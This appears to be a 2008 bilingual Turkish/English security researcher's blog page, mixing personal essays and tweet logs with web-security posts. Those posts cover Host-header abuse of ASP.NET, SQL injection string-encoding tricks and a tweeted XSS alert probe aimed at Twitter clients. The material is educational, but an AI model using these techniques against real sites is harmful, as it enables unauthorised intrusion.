Şan / Şöhret,
Cyber Grafiti veya benzeri gösteriler, Saldırgan sistemi kırabildiğini tüm dünyaya gösterir
Ego Tatmini,
Saldırgan karşıdaki sistemi kırıp kendisinin sistemin geliştiricilerinden daha iyi olduğuna inandırır, ek olarak kırılamayanı kırmış yeni bir şey yapmıştır.

Peki aynı durumda penetration tester ne yapmaktadır, onun motivasyonu nedir?

Para,
Sistemi kırmak, kontrolleri geçmek güvenlikçinin pozisyonun koruması ya da daha iyi bir tester olup daha çok maaş alması demek.
Şan / Şöhret,
Konu ar-ge olunca durum tamamen aynıdır, güvenlikçi yayınladığı yeni bir bir makale, araştırma yazısı ile o çevrede ünlenecektir, aynı şekilde saldırının başarısı ile de firma ya da kendi içerisinde bulunduğu grup içerisinde ünlenecektir.
Ego Tatmini,
Güvenlikçi bu noktada saldırgan ile birebir aynı duyguları paylaşır.

Görüldüğü üzere güvenlikçi ile saldırgan tamamen aynı duygular içerisindedir, dolayıyla penetration tester’ lar dünyadaki saldırgan rolünü direk olarak oynayan sayılı mesleklerin birini icra etmektedirler.

Yazının devamı gelecek inşallah, orada biraz daha psikolojik farklılıklara, daha verimli olmak için yapılması gerekenlere ve en sonra olarakta kendinizi bu alanda nasıl geliştirebilirsinize ve Derinlemesine Bilgi, Paranoya, Tutku, İletişim Becerisi, Okuma konularına değinmeye çalışacağım.

Application Security and Redefining User Input

Ferruh Mavituna — Pzt, 23 Haz 2008 22:46:43 +0300

One of the cardinal rules of the web application security is "Do not trust the user input" but it's loosely defined. We should've said "Do not trust any input!"

Which input is coming from the user?

Web applications are more complicated than they were. Now we have got office applications and shiny Web 2.0 stuff all over the web. Complexity comes with a price tag and lots of hidden layers.

A perfect example of a hidden layer is the second order injections where the injection goes into a back-end storage, then directly pulled out from there and used in an SQL Query, printing out to the HTML without filtering or something similar. In this level developers believe that data was secure, because it was coming from a back-end, which was supposed to be secure. Guess what, it's not!

The fact is you can't keep track of your inputs, your input can come from an API that you exposed to your users, an old form which is adding records your db etc.

First defence would be centralising the input as much as possible, duplicated code is a big threat for security, but this is not enough. You need think "defence in depth" and you should not trust any input. It can be coming from the functions of your programming language, your database internal variables or from your web server, Do not trust any input!

Recently a CSRF vulnerability spotted in twitter. Twitter has two post screens, one of them for mobile and one of them for normal web browsers. Even though they put a CSRF protection to the normal page, they forgot to put this to the mobile interface. A perfect example of how code duplication can hurt your application's security.

About couple of months ago I was working on an application and observed that an ASPX file actually doing an HTTP request to itself and then it was printing the response in the page. First question was “How the script would know where is it running from? Which host? Which exact URL?”

The answer was quite obvious: Request.Url, Follow up question was “How ASP.NET would figure out what's in the Request.Url?”. The answer was: "Host Header" of the request. Which means if the target application configured to response all requests for that IP address then you can change the host header to anything you want to accomplish following actions:

Using this system as a proxy to browse internal network by sending HTTP requests around,
Abusing trust relationships in the internal network and in the very same computer, A perfect example of this accessing ASP.NET error messages and trace.axd file which are only available to local IP address by default.

It's quite common to see rookie developers blindly trusts HTTP Headers such as HTTP_REFERRER or Cookies, Thus you can carry out SQL Injection attacks, XSS attacks via these channels easily. Experienced developers or more security minded developers are not so naive and they know one can easily modify these. Still it's quite common to rely on system functions or server functions to be secure, because they are coming somewhere you trust, right?

As shown in the previous example even the functions such as Request.Uri might be controlled by the attacker. Therefore you should not trust anything coming from anywhere...

Yeni Tasarım - Ön Gösterim!

Ferruh Mavituna — Paz, 22 Haz 2008 13:30:09 +0300

İşte ingilizceden türkçeye kelimeleri hunharca çevirince böyle 'kaydırma çubuğu" ve "ön gösterim" gibi tuhaf kelime guruplarına sahip oluyorsunuz. Neyse konumuza girelim;

Hatırlarsanız reklamlardan ve küçük değişikliklerden bahsederken bu site için yeni bir tasarım üzerinde çalıştığımı belirtmiştim. Her zamanki gibi planladığımdan beş kat daha fazla sürdü ama nihayet ilk gösterim için hazır. Şimdilik güncel içerik olmayan test yayını http://v3beta.mavituna.com adresinde.

Yeni tasarıma geçmek sanırım bir iki ay daha sürecek.

Bildiğim tüm sorunları çözmeye çalıştım:

En büyük değişiklik İngilizce ve Türkçe sitelerin ayrılıyor olması. Yeni site tamamen Türkçe olacak ve içerisinde ingilizce yazı bulunmayacak, yeni bir subdomain geliyor english.mavituna.com bu da ingilizce yazıların bulunacağı ve tamamen ingilizce olacak olan blog. İngilizce blogu adam gibi açmak çok uzun süredir aklımdaydı ve bu aralar özellikle bir çok arkadaşım da ingilizce blogumu açmamı istiyor. Genelde ingilizce - türkçe blog senkronize olmayacak, bunun ana nedeni çeviriye üşenmem. İngilizce bloglama ve neden bu kadar geç kaldığım hakkında daha sonradan gene bir şeyler yazmaya çalışacağım. Özetle nihayte ingilizce - türkçe içerik ve arabirim tamamen ayrı olacak.
Maalesef çok fazla Yorum Spam' i olduğundan dolayı spam' e karşı CAPTHCA koydum. Ek olarak düzenli kullanıcılara her zaman CAPTCHA çıkmasın diye çözüm getireceğim. Wordpress bu şekilde bir şeyler yapıyor,
Trackback desteği ekledim, ancak henüz adam gibi test edilmedi. Bir de Trackback spam ile başedebilecekmiyiz bilmiyorum,
Yeni bir "Tag Cloud" - "Etiket Arşivi" ekledim, bayağı seksi bir şey,
Ana sayfayı ikiye ayırdım, varsayılan olarak sadece "Teknik Makaleler" listeleniyor, diğer tüm makaleler için "Tüm Yazılar". Bu testtte bunu iptal ettim çünkü henüz teknik makale seçimini yapmadım. Bu sayede kişisel ve ilginizi çekmeyen yazılardan kurtulmuş olacaksınız ve sadece teknik yazıları ana sayfada göreceksiniz.
Gelişmiş Arama, Muhtemelen kendi sitemde en fazla arama yapan kişi benim, çünkü yazdığım konulardaki kaynaklara ya da notlarıma bakmak istediğimde onları siteden bulmaya çalışıyor. Dolayısıyla muhtemelen gereğinde fazlasını yapan bir gelişmiş arama kısmı yazdım. Bir sürü değişik seçenek ile herşeyi arayabiliyorsunuz.
RSS, Zaten bir çok şey için RSS' imiz vardı. Şimdi ise herşey için RSS var. Benim için RSS çok önemli, tüm arama sonuçları, tüm etiketler ve yorumlara RSS ile üye olabilirsiniz. Mesela sadece programlama ile ilgili yazılar ilgnizi çekiyorsa, programlama etiketine RSS ile üye olup sadece bu yazıları takip edebilirsiniz.
AJAX, En sonunda bende vagona atladım. Tüm sitenin her biryerinden AJAX fışkırıyor ama Javascript' iniz yoksa da site çalışması gerektiği gibi çalışıyor. AJAX özellikle "Kimsenin Takmadığı Yazılar" gibi yerlerde çok pratik oluyor.
Menü sevmeyen insanlar için sağdaki menü gizlenebiliyor ve site bunu hatırlayıp o menüyü size bir daha göstermiyor,
Detaylı Arşivler, Sitede 1600+ den fazla yazı olunca adam gibi arşiv olması önemli bir faktör haline geliyor. Dolayısıyla güzel bir arşiv yapısı kurmaya çalıştım. Bazı arşiv seçenekleri:

Bu Yazılar Kaçmaz adı altında kayda değer ve okunası son iki yazıyı her zaman ana sayfada listeleyecek bir özellik ekledim. Bu sayede arada ben saçmalamaya devam etsemde saçmalamadığım yazılar gene ana sayfada kalabilecek.
Yorumları e-mail ile takip edebilme,
Teknik Detaylar, bu siteyi yaparken çok fazla teknik detay ile boğuştum. Site ASP.NET, Framework 2 ile geliştirildi, ViewState vs. yok, yani bir çok ASP.NET sitesi gibi değil, kendi yazdığım ASP.NET MVC ye benzer bir model. Dinamik tema desteği var yani birden farklı dilde, temada çalışabilir ve bunu tek yerden yönetiyor. İngilizce - Türkçe site aslında tek dosyadan çalışıyor olacak mesela. Daha bir çok teknik detayı dokümente etmeye çalıştım ve inşallah yeni siteyi yayınlarken tüm geliştirmeyi de 15+ sayfa kadar blog olarak yayınlayacağım. Vakitleme, sorun çıkaran şeyler, çözümler, kullanılan componentlar vs. bir çok konuya değinmeye çalıştım.

Eksikler ve Potansiyel Sorunlar

Bazı yerlerde ufak çözülmesi gereken teknik detaylar var,
Tasarımda footer gibi bir kaç yerin gözden geçirilmesi gerekiyor,
Gelişmiş aramada "Yorumlar" ve "Etiketler" de henüz arama yapılamıyor,
Yönetim ekranları daha geliştirilmedi,
IE 6 de adam gibi çalışmıyor ama bunu düzeltmeyeceğim, Genelde IE 6 kullanıyorsanız güvenlik açısından ciddi sorunlarınız var demektir. Ek olarak site tamamen okunmaz hale gelmiyor ama sağdaki menü sapıtıyor.

Son olarak, en büyük soru şu : Yeni tasarım güzel mi? Maalesef güzellik göreceli bir kavram, hatta kullanılabilirlik bile göreceli bir kavram olabiliyor. Burada gelen yorumlardan size göre nasıl olduğunu göreceğiz, ama ben bu tasarımdan mutluyum.

Weird My.Settings behaviour in Web Site Projects

Ferruh Mavituna — Paz, 15 Haz 2008 11:20:22 +0300

According to MSDN "My.Settings" doesn't exist in Web Site projects but if you add a public shared function to one of your web pages and use My.Settings, it works perfectly fine. However if you try to use it under your App_Code it won't. I have no clue why the limitation exists in the first place anyway.

Online Conversion Tool

Ferruh Mavituna — Cmt, 14 Haz 2008 04:10:04 +0300

This is a really simple Javascript based conversion tool.

It can help you for :

SQL Injection

MS SQL Char
"foo" will be "SELECT CHAR(102)+CHAR(111)+CHAR(111)"
MySQL CONCAT
"foo" > "SELECT CONCAT(CHAR(102),CHAR(111),CHAR(111))"
MySQL Hex
"foo" > "SELECT 0x666f6f"

String.fromCharCode()
"foo" > "String.fromCharCode(102,111,111)"

Hashing

MD4
MD5
SHA-1
SHA256

Encoding

Base64
URL
JS Escape
HTML UTF-8

Decoding

Base64
URL
JS Escape

Also optionally output can be URL encoded.

NetBouncer ASP.NET Input Validation Library

Ferruh Mavituna — Cum, 13 Haz 2008 00:16:45 +0300

NetBouncer .NET Input/Output Validation Library's first version is out now. It has got some basic documentation as well as compiled release. It's uses New BSD Licence allows you to integrate into your commercial or non-commercial applications.

It's simple yet effective, all input validation is centralised from one place, allows you to integrate your custom plug-ins and custom rules. New Rules can be written in XML or in your native .NET language. Designed ASP.NET in mind can be used in any .NET application. Grab the source-code, check it out. If you fancy, contribute.

Feel free to report issues or drop me an e-mail. Now spread the word and secure your application.

Sosyal Yazılım Geliştirme

Ferruh Mavituna — Pzt, 09 Haz 2008 23:12:33 +0300

OO (Object Oriented) programlamanın ve unit testing' in genel yazılım geliştirme pratiği olduğu, sosyal platformların patladığı ve RPG oyunlarına hasret olduğum şu günlerde aklımda yeni bir zihni sinir web projesi dolaşıyor.

Malum ben tembel adamım, konuşmasına konuşurum ama iş yapmaya gelince "işe gitmeyen" kişilerden biriyim. Bunu idrak etmem ile birlikte artık kendi kendime değerli olduğunu düşündüğüm ama eyleme geçirmedikten sonra hiç bir değeri olmayan fikirlerimi de daha hızlı şekilde buradan paylaşmaya çalışacağım. Bu da onlardan bir tanesi.

Ana Fikir

Bir yazılımın internet üzerinden sitenin üyeleri tarafından geliştirilmesi. Örnek olarak üyelerin birlikte bir "RSS Okuyucu" geliştirmesi. Her kişi bir metodu vs. geliştirecek ve daha sonradan bunların hepsi birleşince karşımıza kollektif olarak geliştirilmiş bir "RSS Okuyucu" çıkmış olacak.

Teknik İmplementasyon

Temel olarak bir kişi yazılım tasarımını mümkün olabilecek en detaylı şekilde tasarlar ve tüm OO iskeletini çıkartır. Bu iskeletten sonra her obje için yoğun şekilde Unit Test' ler geliştirilir. İşin bu kısmının bir kaç kişi arasında klasik açık kaynak kodlu yazılım geliştirme süreci gibi yapılması gerekebilir.

Bu adımdan sonra siteye giren üyeler istedikleri projeyi seçip herhangi bir bölümü kodlamaya başlayabilirler, daha sonradan kodlar siteye yüklenir veya direk orada yazılabilir. Bundan sonra eğer kodlar Unit Testlerin hepsini başarılı bir şekilde geçiyorsa onay aşamasına gelir.

Onayda bekleyen tüm kodlar gene başka kişiler tarafından onaylanır. Bu süreçlerin hepsindeki katılımcılar sitede deneyim kazanır. Site aynı bir oyun gibi "başarı - achievements" ve "experience - deneyim" puanları içermelidir. Dolayısıyla komüniti faktörü yüksek tutulmalıdır.

Bunun harici son implemantasyon ve geliştirme sürecindeki değişiklikler gene ana tasarımı yapan ekibin elinden geçmelidir, bundan sonra yazılımın son versiyonu hazır hale gelecektir. Bunlar harici sistem istenildiği gibi çalıştığı takdirde firmalar ticari olarak kendi projelerini gönderebilir ve her modüle fiyat koyabilirler. Bunun sonucu yazılımlarcılar site içerisindeki reytinglerine göre bu geliştirme işlerini yapabilir ve site üzerinden para da kazanabilirler.

Potansiyel Sorunlar

Kod ve Unit Testlerin Güvenli Ortamda Olması, Yani upload edilen kodların güvenli şekilde çalıştırılması,
Proje geliştirici ana ekibin işini yapabiliyor olması,
Sistemin verimli şekilde sadece belli dillerde çalışabilecek olması. Muhtemelen en verimli diller .NET ve Java olacaktır,
Bir sistemi bir defa tasarlamak pek mümkün olmadığından ana iskeletteki tasarım değişikliklerini ve revizyonların getireceği sorunlar.

Ek olarak belirtmem gerekir ki bu fikir tamamen yeni değil, bu şekilde kurumsal yazılım geliştiren firmalar var ancak tüm çalışanları uzman ücretli geliştiriciler. Dolayısıyla OO iskeletini ve Unit Testleri tek merkezden geliştirip büyük gruplara outsource etmek zaten aktif olarak yapılan bir çalışma. (Bu konuda ünlü bir firma vardı ancak adını unuttum bilen varsa, bekliyorum).

Bunun yanında sisteme açık sosyal bir platform getirmek ve kendi içerisinde Ohloh tadında bir kültür oluşturmak hem eğlenceli olabilir hem de çok güzel çıktılar verebilir. Proje mevcut yazılımlara yeni bir eklenti ya da yeni özellikler eklemek için de kullanılabilir, dolayısıyla çok büyük projeler yerine ufak projeler de hızlı şekilde üretilebilir.

Getting Real - Kitap Notları

Ferruh Mavituna — Cum, 06 Haz 2008 00:53:26 +0300

Dediğim gibi bugün Getting Real' ı bitirdim (son bir kaç bölüm essay kaldı). Son zamanlarda bir çok konuda kısa notlar tutuyorum, bu notlar da Gettin Real' dan:

Less Features

Only explicitly required features for that moment, If it’s not reuqired right now by you do not do it now.
Less interface.

Focus on something, solve it

Do not try to beat competitors use a new way, put something new into the market,
Know your enemy, Choose and focus a point.

Money

Use less money, small team, less features,
First version of the app should be able to developed by only 3 people.

Embrace Constraints

Use Deadlines,
Lower the scope to meet deadlines.

Business

Do not try to act big, show personality, show that you are small and take advantage of it.

Priorities

What’s your big idea?
Work small, ignore details in the beginning, you can work on them later. Try to have fun with what you do.
Don’t fix a problem before it’s a problem.
Find your audience and market, focus on their expectations,
Take a side
1. Application should take a side strictly, this might piss off some clients but who gives a shit. They can choose another solution.

Features

make application as small as possible, Feature wise, Code wise etc.
Instead of having lots of features which don’t work, have a few which work great,
Build features and cut it half, that's what you need,
Focus on only essential features and rest will come after essentials are good,
Remove features which “Just doesn’t matter”. If a feature not changing outcome remove / don’t develop it.
Do not try to please everyone, focus on the essentials and the target market.
Do not accept features by default, A feature should be accepted after a long battle.
Solve the root problem, and let people to solve the rest of the problem in your framework.

Add a New Feature Routine

Say no.
Force the feature to prove its value.
If “no” again, end here. If “yes,” continue…
Sketch the screen(s)/ui.
Design the screen(s)/ui.
Code it.

Process

Do it instead of spending ages on planning it, do it as a early, shortcut dirty version if it’s required.
Build, Revise, Repeat…
Avoid Prefences, Put your professional expertise, make a default setting stick with it. Just ignore little details focus on the essentials.
Do the decision, make your call, get it done, unless you got it working your idea is pointless.
It doesn’t matter it’s beta or not, get it released. It may not be perfect but release it, then you might fix it.

Unity

Have alone working time, “Set up a rule at work: Make half the day alone time. From 10am-2pm, no one can talk to one another (except during lunch). Or make the first or the last half of the day the alone time period. Just make sure this period is contiguous in order to avoid productivity-killing interruptions.”

Release often to keep yourself motivated, Add new small features and have small releases to keep yourself motivated.

Design

Prioritise the design, most important element to less important one.
Use a simple and good language in the UI.

Coding

Code less, and code only required functionality,
Do trade-offs between more feature and less code,
Think 10 times before add a new feature, think 100 times before add a BIG feature.
If you hacked the to code to get it work, go back and fix it before it bites you later.

Words

Don’t document stuff, build a mockup instead.
To explain and document features use a real-worl alike story. Don’t go into technical details do it in a human way.
Personify the application, decide a personality for your application and use it consistently in every single section. Design, interface, messages, features.

Pricing

Give something for free. Lite version, sample etc.
Make sign-up and cancellation easy, allow your users to export their data whenever day want in a acceptable format such as XML.
Don’t do stupid trick for contract, make it obvious and easy such as pay monthly and cancel whenever you want style.

Promotion

How to launch a new product
Promo Website
Write education materials, books, videos, tips and tricks about the product,
Add small features and promote them in specific groups,
Try to sell more to your current users, (such as upgrade plans)
Choose a simple, short and catchy name instead of something long and too descriptive,

Support

Do not use external support team, let developer to do the support
Use inline help (such as a note for a known problem) in the application and Keep stuff simple so anyone can use it without training,
Have a quick turnaround time in support requests (no more than an hour),
Customer is not always right,
Use forums to help customers to themselves,
Publicise Bad News

Post Launch

Keep a development blog,
Keep releasing often, show people that you are alive,
Don’t do public beta, if it’s not good enough to be public don’t make it public,
Prioritize your bugs,
Keep watching your enemies.

Güncel Notlar

Ferruh Mavituna — Cum, 06 Haz 2008 00:42:04 +0300

Son bir haftadır soho' da çalışıyorum, kaynak kod incelemesi, bu da günümün ekstradan 2,5 saatinin kaybolmasına neden oluyor ve döndüğümde gayet yorgun oluyorum. Bu da diğer tüm işler ile ilgilenmemi engelliyor. Bir hafta daha oradayım
Getting Real' ı daha önceden okumaya başlamıştım ama bir türlü adam gibi oturup bitirme fırsatım olmamıştı, bugün onu bitirdim. Hakkında konuşmak istediğim çok şey var ama genel olarak tam bir başyapıt.
PSP Killzone, Grid ve Puzzle Quest oynuyorum,
Bugün bir çin restoranında biraz çin yemeği denedim, bu adamların mutfakları ingilizlerden bile beter, aman bir daha Allah korusun.
Çok film izledim, ama şu iki tanesi süperdi : The Island ve Atonement
Lost' un son bölümünü izledim, nedense eskisi kadar sarmamaya başladı.
Bir süre önce Prison Break izlemeye başladım, ilk sezonun sonlarındayım.
Televizyon izlemeyi tamamen bıraktım sadece dizi ve film izlemeye başladım.
NetBouncer için yeni planlar yaptım, inşallah iki hafta sonra ilk versiyonu yayınlıyorum. Şimdiden denemek isteyen SVN' den son versiyonu indirebilir.

Bunlarda son haftanın genel notları:

04 June 2008

5:55 PM: fmavituna: onsite for 2 weeks, can't even read e-mails, see you 2 weeks later twitter!

Testing a personal firewall solution, a couple of resources

02 June 2008

12:06 PM: fmavituna: @YuSuPh Ilginc bir ozellikmis, textarea da calisti benim icin ama eger tablo varsa yazi yerine direk tabloyu seciyor.
12:05 PM: fmavituna: checking out PHPSecInfo slides, quite nice idea : http://tinyurl.com/4oyw8v

The NTLM Authentication Protocol
The simExchange - The Video Game Prediction Market

New Fallout 3 Pictures
Slides from php|tek 2008
Scurvy Again: Slides & Demo

01 June 2008

12:05 AM: fmavituna: Trial of Assault Heroes expired, looking for some other stupid game to kill time
12:05 AM: fmavituna: @YuSuPh ben de hemen kutlayayim :) Nice senelere...

Common Exception Types
Shmoocon 2008 Videos

Online Poker Software hacked by insiders at UltimateBet.com
Holy crap, Shmoocon 2008 videos

31 May 2008

5:33 PM: fmavituna: librarything' in oyunlar icin olan versiyonu var mi? Uzun suredir ariyorum bulamadim boyle bir site.
4:52 PM: fmavituna: @YuSuPh bende FF eskisi gibi baska bir sitenin ikonunu karistirmis saniyordum, hakikaten tirtmis ikon.
4:51 PM: fmavituna: I've started play GRID today, such a brilliant game. I think they tuned the controls, it's a bit easier than demo.

30 May 2008

2:29 PM: fmavituna: this week was so boring and sleepy, let's goooo homeeeeee
11:06 AM: fmavituna: this market getting hot - http://tinyurl.com/55thft
9:05 AM: fmavituna: this is a potential break up song lalala llalla, bu sarki kafamda dun geceden beri, cok fazla pop etkisinde kaliyorum bu aralar.

HOW TO FIND MEMORY LEAKS WITH CLRPROFILER | Dev102.com
Download details: CLR Profiler for the .NET Framework 2.0
Deblector - Release: Deblector 1.0
Denis Bauer's Reflector.FileDisassembler

Strong Opinions, Weakly Held
Microsoft Kernel kaynak kodları açıyor

10:30 PM: fmavituna: Looking beta testers for Centralised I/O Validation Library for ASP.NET - http://code.google.com/p/netbouncer/ it's in Alpha stage.
9:53 PM: fmavituna: changed ads in the blog, installing Pex, replying e-mails and bloody bored. lots of things to do, not enough time...
1:44 PM: fmavituna: why you shouldn't use xbox as a server http://tinyurl.com/2oyah9
12:31 PM: fmavituna: @aft bu gmail in basina o kadar dert olmus ki ozel uyari gosteriyorlar firebug ile gmaila girince.
12:29 PM: fmavituna: sanirim bu tum gurbetcilerin basina geliyor, asiri sinirlenince Turkce kufretmeye basliyorum, ingilizce kesmez oluyor.

pickaproxy.com - geospoofing your cyber presence
More built-in Windows commands for system analysis

İlham kaynakları
Fallout 3: The Al Qaeda Connection!
pickaproxy.com - geospoofing your cyber presence
massive digital ceiling clock
Windows 7 ekran görüntüleri dışarı sızdı

Günler...

Ferruh Mavituna — Cum, 06 Haz 2008 00:12:42 +0300

Günler geçiyor, son zamanlarda yazamıyorum. Çeşitli nedenleri var, sanırım istememezlik, bezmişlik, "Neden arama" bunlardan bazıları. Bu aralar yazmak istiyorum, en az yazmamak istemediğim kadar. Paylaşmak, anlatmak istediğim çok şey var ama maalesef düşünmek ve ekrana dökmek farklı süreçler, aynı anda çalışamıyorlar.

The Escapist' den Simplified Systems yazısı ile Getting Real' daki özellikleri, Zayıf Olduğunu bilmeyi ve amaca ulaşmayı kafamda irdeliyorum. İfadesizliği düşünüyorum, yazmanın ne kadar zor olduğuna bakıyorum. Hayatımın %25' inin benim, hatta aslında onun da benim olmadığını düşünüyorum...

2- Neden Paylaşıyoruz

Ferruh Mavituna — Cmt, 31 May 2008 01:59:26 +0300

Bundan üç sene kadar önce bir MM İstanbul (artık Adobe İstanbul) toplantısında şu an maalesef ismini hatırlayamadığım bir arkadaş bir soru sormuştu:

Neden bilginizi paylaşıyorsunuz?

Ben o zaman sanırım open source' tan aldım open source' a veriyorum gibi bir şeyler demiştim, kendim inanmışmıydım bilmiyorum ama open source' un open source için olduğuna hiç bir zaman inanmadım. Şimdi düşünüyorum ve komik bir şekilde hala emin değilim, emin olmadığım veya mantığını algılayamadığım bir şeyi senelerdir yapmak pek benim tarzım değil ama gelin görün ki bu da her sabah 09:00 da gidip her akşam 18:00 eve dönüp hiç sorgulmadığınız işiniz gibi bir şey, sorgulamıyorum sadece yapıyorum.

Yazıyorum, anlatıyorum, kasıyorum, paylaşıyorum... ama sorgulamıyorum, sorguladığım zamanlarda da, şu cevabı alıyorum :

0 rows were returned

Daha önceden açık kaynak kod hakkında konuşurken potansiyel nedenler olarak şunları sunmuştum,

İnsanlara Yardım Etmek (peh!)
Şöhret
Kariyer
Uzun vadede bir iş modeli ile para ve güç kazanma

Bugün bakınca ekstra bir neden daha sunamıyorum, bu nedenlere bakınca açıkçası hiç biri benim için gerçek bir neden değil. İkinci neden belki egovari bir açıdan bilinç altı nedenlerinden biri olabilir ama bilinç altım tatmin olacak diye hafta sonu proje geliştirecek kadar henüz kafayı yemedim.

Özetle bu bir cevap yazısı değil, soru yazısı ya da daha doğru bir terim ile cevap arayış yazısı. Neden paylaşıyoruz? Neden bir blogumuz var? Neden açık kaynak kodlu bir şeyler yazıyoruz? Neden gidip çimlerde yatmak, pazarları mangalda sucuk çevirmek varken kendimizi kasıyoruz? Neden twitter' dan mesaj atıp library thing' e kitap listemizi koyuyoruz? Neden facebook' ta kelle kelle fotoğrafımız var ve hayatımızın her karesi Flickr' da, Neden youtube ta gitar çalıyoruz?

Yoksa bunların hepsi Counter Strike sunucusunda birinci olmaya çalışma nedenimimizle tamamen aynı mı?

1- Yüreğinin Götürdüğü Yere Git

Ferruh Mavituna — Cmt, 31 May 2008 01:34:26 +0300

Arabesk başlıkların hastasıyım... Uzun zamandır yazmak istediğim bir türlü yazamadığım teknik olmayan konulardan biri bu.

Kimi insanlar bir şey yapar ve on sene, yirmi sene, elli sene onu yapmaya devam ederler çünkü bunu seviyorlardır, kimi insanlar bir şey yapar ve on sene, yirmi sene, elli sene onu yapmaya devam ederler çünkü yaptıklarının sonuçlarından memnunlardır, yaptıkları onlar için çalışıyordur. Kimi insanlar bir şey yapar ve sonra bunu yapmayı bırakır, başka bir şey yapar.

Metallica Kill' em All yaptı, And Justice for All... yaptı sonra da gitti Load yaptı ReLoad yaptı, daha sonra da gitti S&M yaptı. Rotting Christ Non Serviam yaptı sonra gitti A Dead Poem yaptı, bunun yanında bazıları 25 sene aynı müziği yaptı. Kimin neyi niye yaptığını göğüslerini açıp kalplerini çıkarmadan bilemeyiz ama şu var ki eğer bir şey öğreniyorsak ve yaşıyorsak, değişiyoruz demektir, eğer değişiyorsak içten gelerek yapılan bir şeyi uzun süre aynı şekilde yapamayız demektir.

Dolayısıyla insanlar bir çok müzisyene "kaydı", "döndü", "kalitesini kaybetti" derken ben onların gerçek müzisyenler olduğunu düşündüm, insanlar için değil müziği kendileri için yaptığını düşündüm. Eğer bir sanatçı beş sene aynı şeyi yapıyorsa sanırım ondan şüphe etmemiz gerekli.

Bütün bu yazının yegane amacı bu blogun neden her gün değişik telden çaldığını, neden beş sene önceki, dört sene önceki, üç sene önceki, iki sene önceki ve bir sene önceki gibi olmadığını ifade edebilmekti. Ben değişiyorum ve bu blog ticari değil, ben değişiyorum ve bu blogun adı "Ferruh Mavituna", ben değişiyorum ve bu blogda değişiyor. Bundan seneler önce pratik konular çok daha ilgimi çekerken artık teorik konular çok daha ilgimi çekiyor. İşletim sistemi değil, onun altındaki tasarım ilgimi çekiyor, Ruby değil yazılım dillerinin gittiği nokta ilgimi çekiyor, açığı yamamak değil onu hiç olmayacak hale getirmek ilgimi çekiyor.

Aynı şekilde dün güneşin sarı olduğunu düşünürken, bugün aslında kahverengi olduğunu düşünüyorum, dolayısıyla bu blogta bir kendiyle çelişen bir şey görmenizden doğal bir şey yoktur, çünkü ben kendimle çelişiyorum ve fikirlerimde çelişiyor. İşte bu yüzden artık başka şeyler yazıyorum, yarın uçan balıklar ilgimi çekerse uçan balıklar belgeselimi nasıl çektiğimi yazmaya başlayabilirim. Bir şekilde okuyucular bu blogu okuyor ve kendi kafalarında bir şekil çiziyor. Bu sterotiplerin hüküm sürdüğü bir dünyada, çizdikleri şekili devam etmeyince hayal kırıklığına uğruyorlar.

Bu keyifsiz bir yazı sanırım artık blog yazmanın eski keyfi kalmadı, ya da aslında hiç bir zaman keyfi yoktu. İşte bu yüzden bu aralar pek yazmak istemiyorum. Blogların sosyal imlerle popüler olduğu, hit almak için twitter' a, facebook'a sosyal Web 2.0 aksiyonlarına üye olunan, marketing denilen hadisenin alıp götürdüğü bu zamanda blog yazmanın keyfi nasıl olabilir ki? Umuyorum ki hiç bir zaman sadece bir konu ya da iki konu üzerine tekrar tekrar ve tekrar konuşacağım bir blog olmayacak bu, eğer noktaya gelirsem bu keyif değil iş olmuş demektir.

Yapmaya çalıştığım şeyler:

Fütursuzca yazmaya devam etmek,
Cümlelerim arasında ne idüğü belirsiz kelimeler kullanmaya devam etmek,
Bin kişiden birinin anlayacağı göndermeleri yazıya sıkıştırmak,
Yazı dizisi yazacağımı iddia edip bir yazının serisine başlayıp hiç bir zaman ikinci yazıyı yazmamak,
Ayrı yazılan de ve da ları ayrı yazmamak ya da bazen yazıp bazen yazmamak, bilmemenin ayıp olduğuna inanmayıp, "ignorance is blissdir canım" diye çığlık atmak,
Yazarken keyif almaya çalışmak, almazsam yazmamak,
Uzun mektup gibi yazılar yazmak ve sağa sola üç km. öteden gönderme yapan resim sıkıştırmamak (lakin denedin amele gibi duruyor!).

Kusura bakmayın ben profesyonel bir blogcu değildim, olmayacağım da.

28.05 - Projelere Devam

Ferruh Mavituna — Per, 29 May 2008 01:39:56 +0300

Bugün değişik pek bir şey olmadı, hayat devam ediyor...

28 May 2008

5:16 PM: fmavituna: @aft hayirdir? Performans sorunlari mi?
5:15 PM: fmavituna: twitter fu*@_ed up again
4:28 PM: fmavituna: @YuSuPh evet ona dedim ama sanirim twitter bugun sapitiyor hangi reply hangisine gitmis diye
3:50 PM: fmavituna: Also it's quite funny reported 4 years ago but no one gave a shit - http://tinyurl.com/6jc2c5
3:49 PM: fmavituna: This issue was known in Apache, but it's cool someone researched it thoroughly, affects IIS and some others - http://tinyurl.com/6zwa3j
3:41 PM: fmavituna: @YuSuPh Turkce 101 :) Bunu Hakki Ocal hocama sormak lazim, o yazilarinda cok kizardi bunlari yanlis kullananlara.
3:30 PM: fmavituna: @McGrewSecurity :) distributed XSS testing, Unless twitter API encodes it before sends out at least 10 tools should be vulnerable to this.
1:56 PM: fmavituna: OK, test edelim:<script>alert(/Is your twitter tool XSSed? If you can see thix fix it!/)</script> bakalim bu kimde patlarsa ...
1:26 PM: fmavituna: @YuSuPh OK, senin sitedeki kodu gorunce onu aktif olarak uygulamaya aldin sandim,
12:37 PM: fmavituna: @YuSuPh Bu arada RSS ciktilarini HTML_Entities gibi bir seyden geciriyormusun? Title ve icerik icin ozellikle, Guvenlik acisindan onemli.
12:35 PM: fmavituna: @YuSuPh Dogru amac icin isini gorecektir, benim kafamda daha komplike bir durum vardi :) Neyse bu konuda zaten yakinda bir seyler yazacagim
12:34 PM: fmavituna: reading presentation of OWASP EU 08

İnternet Teknolojileri Derneği Başkanı: ''internet yasası ifade özgürlüğüyle ...

İnternet Teknolojileri Derneği Başkanı: ''internet yasası ifade özgürlüğüyle bağdaşmıyor''
Bilkent Üniversitesi Endüstri Mühendisliği Öğretim görevlisi ve İnternet Teknolojileri Derneği Başkanı Doç. Dr. Mustafa Akgül, Meclis’te görüşülen internet yasası tasarısının ifade özgürlüğüyle bağdaşmayacağını söyledi. Akgül, devletin vatandaşlar adına zararlı içeriği belirlemesinin internetin gelişimine zarar vereceğini savundu...
FM Yorum : Biri ifade ozgurlugu mu dedi? Saka gibi. bizim anlayamadigimiz sorunun internetten buyuk oldugu, ama biz internetciler olarak sadece kendi kicimizi kollamaya calisiyoruz. o da bir sey tabii, hakkini yememek lazim.

